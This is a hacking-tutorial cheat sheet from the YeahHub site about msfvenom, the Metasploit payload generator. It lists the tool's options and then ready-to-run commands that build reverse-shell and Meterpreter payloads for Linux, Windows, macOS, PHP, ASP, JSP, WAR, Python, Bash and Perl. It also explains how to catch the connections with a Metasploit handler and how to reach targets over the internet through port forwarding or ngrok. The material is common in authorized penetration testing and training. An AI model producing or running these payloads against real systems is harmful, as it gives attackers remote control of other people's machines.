Tutorials

MSFVENOM – All payload examples – Cheatsheet 2017

Msfvenom is a Metasploit Standalone Payload Generator which is a replacement of msfpayload and msfencode. Through msfvenom, you can generate any kind of shellcode/payload depending upon the platform/OS you want to hack.

Often one of the most useful abilities of Metasploit is the msfvenom module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation.

For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run “set payload” for the relevant payload used and configure all necessary options (LHOST, LPORT, SRVHOST, SRVPORT etc). Execute and wait for the payload to be run.

For exploitation in local network, fill up your IP address in LHOST but for exploitation over WAN, you need to fill it with your Public IP and make sure that your port must be forwarded or you can also use NGROK tunnel if you’re facing any problem with port forwarding. Ngrok will automatically forwards all traffic to your localhost.

The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

Usage of Msfvenom:

msfvenom [options] <var=val>

To list out all options, type “msfvenom -h

-p, –payload Payload to use. Specify a ‘-‘ or stdin to use custom payloads
–payload-options List the payload’s standard options
-l, –list [type] List a module type. Options are: payloads, encoders, nops, all
-n, –nopsled Prepend a nopsled of [length] size on to the payload
-f, –format Output format (use –help-formats for a list)
–help-formats List available formats
-e, –encoder The encoder to use
-a, –arch The architecture to use
–platform The platform of the payload
–help-platforms List available platforms
-s, –space The maximum size of the resulting payload
–encoder-space The maximum size of the encoded payload (defaults to the -s value)
-b, –bad-chars The list of characters to avoid example: ‘\x00\xff’
-i, –iterations The number of times to encode the payload
-c, –add-code Specify an additional win32 shellcode file to include
-x, –template Specify a custom executable file to use as a template
-k, –keep Preserve the template behavior and inject the payload as a new thread
-o, –out Save the payload
-v, –var-name Specify a custom variable name to use for certain output formats
–smallest Generate the smallest possible payload
-h, –help Show this message

To list out all payloads, type “msfvenom -l

For Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > /root/Downloads/exploits/exploit.elf

For Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > /root/Downloads/exploits/exploit.exe

For Mac:

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > /root/Downloads/exploits/exploit.macho

For PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > /root/Downloads/exploits/exploit.php

For ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > /root/Downloads/exploits/exploit.asp

For JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > /root/Downloads/exploits/exploit.jsp

For WAR:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > /root/Downloads/exploits/exploit.war

For Python:

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > /root/Downloads/exploits/exploit.py

For Bash:

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > /root/Downloads/exploits/exploit.sh

For Perl:

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > /root/Downloads/exploits/exploit.pl

For all shellcode formats, type “msfvenom –help-formats” in your terminal.

Please follow and like us:




Thanks for reading, and make sure to keep an eye on YeahHub for more technical stuff. You can ask the questions here or @yeahhub on Twitter or Instagram.
Yeahhub.com
Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.
http://www.yeahhub.com/

Leave a Reply

Your email address will not be published. Required fields are marked *

two + 10 =